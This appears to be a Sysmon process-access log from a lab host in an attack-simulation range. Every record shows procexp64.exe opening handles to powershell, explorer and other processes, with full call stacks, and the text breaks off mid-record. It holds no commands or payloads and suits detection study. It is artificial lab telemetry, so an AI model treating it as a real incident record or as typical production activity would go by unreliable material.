15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files 